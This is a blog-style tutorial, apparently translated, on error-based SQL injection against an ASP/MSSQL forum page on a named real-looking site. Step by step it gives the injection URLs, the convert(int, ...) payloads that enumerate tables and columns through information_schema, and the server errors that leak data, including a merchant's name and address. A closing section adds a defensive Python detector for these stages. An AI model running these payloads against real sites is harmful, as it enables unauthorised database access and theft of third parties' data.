Hope this is useful. I'm sharing it in this post mainly so I don't forget it myself, since I'm still learning ASP and LOL1ds is still in newbie mode ON here..h. ^_* .
And hopefully it's also useful for any friends who care to stop by
this ugly LOL1dsonline BLOG :P LOL.

OK, CHECK IT OUT....

Example of a vulnerable site:

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12

CHECK VULNERABLE / NOT !!!
==========================

Check whether it can be injected or not by adding a ' at the end of the URL

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12'

If the error looks like this:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56

Microsoft OLE DB Provider (SQL Server Driver) <---- The key part is here !!!
Other than the SQL Server Driver (Provider), I wouldn't know :D

then move on ... FIND THE TABLE STRUCTURE !!!
=============================================

1) Debugging

Debugging here means getting MSSQL to show its error message.

The SQL injection is "and 1="

2) Get the table name

Query nya : and 1=convert(int,(select top 1 table_name from information_schema.tables))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables))--

The error that appears is:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.
/main/ListPosts.asp, line 56

there you can see we got a table named "Merchants".

Unlike MySQL, MSSQL is strict about data types in its output, so we convert the text value to int: the conversion fails, and the error message we want echoes the value back to us.

now let's look for the next table.

Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--

The error that appears:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/main/ListPosts.asp, line 56

You can see the query differs from MySQL. MySQL doesn't support "not in" whereas MSSQL does ^^

ok, we got a table named "category" .... let's try finding the next table.

Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--

The error that appears:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.
/main/ListPosts.asp, line 56

got a table named "Codes". Go ahead and keep looking for whatever table names you want.

FIND THE COLUMN STRUCTURE !!!
=============================

Say we want to find the columns in the "Merchants" table.

Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--

The error that appears:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.
/main/ListPosts.asp, line 56

got a column named "merchantId" ... let's find the other columns :D

Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--

The error that appears:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.
/main/ListPosts.asp, line 56

got the column "address". let's find another column ...

Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--

The error that appears:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.
/main/ListPosts.asp, line 56

got the column "merchantName" ekkekekeke ....

Feel free to keep looking if you want more ^^

RETRIEVING THE DATA !!!
=======================

Say we want to see the contents of the columns "merchantid, address, merchantName" in the "Merchants" table.

Query : and 1=convert(int,(select top 1 merchantid from merchants))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 merchantid from merchants))--

The error that appears:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.
/main/ListPosts.asp, line 56

we got "merchantid" = "alohacc".

so what if we want to pull the contents of these columns all at once??

Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress%2b':'%2bmerchantName from merchants))--

The error that appears:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.
/main/ListPosts.asp, line 56

Note: %2b is the URL-encoded + (string concatenation; a bare + in a URL is decoded as a space), while ':' is the separator between the column values.
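As an added, defender-side example (not from the original post or the site it discusses): the script below recognises each stage of the walkthrough above in percent-decoded query parameters, and flags the verbose ODBC error that makes the technique readable in the first place. The sample URLs and the error body are constructed to match the shapes shown above; the stage labels are my own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed request URLs (same path and parameters as the walkthrough); not real traffic.
SAMPLE_URLS = [
    "/main/ListPosts.asp?tid=11&cat=General+Discussion&msgID=12",
    "/main/ListPosts.asp?tid=11&msgID=12'",
    "/main/ListPosts.asp?msgID=12%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--",
    "/main/ListPosts.asp?msgID=12%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='Merchants'))--",
    "/main/ListPosts.asp?msgID=12%20and%201=convert(int,(select%20top%201%20merchantid%2b':'%2baddress%20from%20merchants))--",
]

# Constructed response body in the exact shape of the ODBC errors quoted above.
SAMPLE_ERROR = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
                "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting "
                "the nvarchar value 'Merchants' to a column of data type int.\n"
                "/main/ListPosts.asp, line 56\n")

# Stages of the walkthrough, most specific first, matched on the percent-decoded parameter value
# (parse_qsl turns %2b into '+' and a bare '+' into a space, which is why the post writes %2b).
STAGES = [
    ("data-extract", re.compile(r"convert\s*\(\s*int\s*,.*\+\s*'[^']*'\s*\+", re.I | re.S)),
    ("column-enum", re.compile(r"information_schema\.columns", re.I)),
    ("table-enum", re.compile(r"information_schema\.tables", re.I)),
    ("convert-probe", re.compile(r"\band\s+1\s*=\s*convert\s*\(\s*int", re.I)),
    ("quote-probe", re.compile(r"^\d+'\s*$")),
]

def classify_request(url):
    """Return the attack stage found in any query parameter of url, or None if it looks benign."""
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for label, pattern in STAGES:
            if pattern.search(value):
                return label
    return None

# The verbose error is what turns a blind bug into a readable one; flag it in responses too.
ODBC_ERROR = re.compile(r"ODBC Drivers error '(80040e[0-9a-f]+)'")
LEAKED_VALUE = re.compile(r"converting the n?varchar value '([^']*)' to a column of data type int")

def leaks_db_error(body):
    """Return (error_code, echoed_value) if body carries a verbose SQL Server error, else None."""
    m = ODBC_ERROR.search(body)
    if not m:
        return None
    v = LEAKED_VALUE.search(body)
    return m.group(1), (v.group(1) if v else None)
```

A hit from leaks_db_error on a production response means the ASP page is returning raw provider errors to the client; turning on a custom error page removes the echo channel even before the query itself is parameterised.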


#OK, that's the end of the check-it-out, and thank you... Wassalamu'alaikum Wr.Wb.


./credit : http://www.blog-tey.com

Article information: ASP MsSQL Injection. Reviewer: LOLids artich. Rating: 4.5.